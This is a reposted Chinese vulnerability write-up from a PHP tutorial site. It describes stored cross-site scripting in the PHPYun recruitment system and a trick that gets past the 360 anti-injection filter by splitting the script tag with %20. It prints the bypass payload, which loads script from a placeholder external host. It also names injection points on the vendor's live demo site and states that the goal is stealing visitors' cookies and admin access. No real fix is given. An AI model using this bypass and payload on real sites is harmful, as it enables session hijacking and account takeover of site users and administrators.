网站地图    收藏   

主页 > 入门引导 > 黑客攻防 >

php云人才系统多处Xss漏洞(绕过360防护) - 网站

来源:自学PHP网    时间:2015-04-15 15:00 作者: 阅读:

[导读] php云人才系统多处Xss漏洞(绕过360),可影响后台及其他用户。360防护挂掉了,这该怎么办。。详细说明:虽然php云人才系统里加入360防注入脚本,对于一般的xss都可以过滤但是我意外...

php云人才系统多处Xss漏洞(绕过360),可影响后台及其他用户。
360防护挂掉了,这该怎么办。。

虽然php云人才系统里加入360防注入脚本,对于一般的xss都可以过滤


但是我意外的发现了一种绕过方法,从而对多处产生xss影响

先说下绕过方法

<script>肯定是过不了的,但是<scr%20ipt>就可以了

至于这个%20加哪就随意了,总之就是不要使句子完整出现,这样可以绕过360,然后是数据提交后,会变回<script>,从而绕过。

可以利用的xss地方很多 凡是有编辑器,源码模式下直接插入<scr%20ipt src="http://XXXX"></sc%20ript>就行

以官网demo为例子,除了上述地方可以插入xss代码外,在http://www.hr135.com/friend
 

1.png



到个人中心看一下
 

2.png



成功插进去



也就是说当别人访问自己的空间时,就可以盗取对方cookie



再说下一处Xss漏洞

举例地址:http://www.hr135.com/ask/index.php

回答别人的问题
 

7.png


 

8.png


 

4.png


 

5.png





有了后台的权限 自然。。。

修复方案:

这个。。。你们比我懂。。。

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论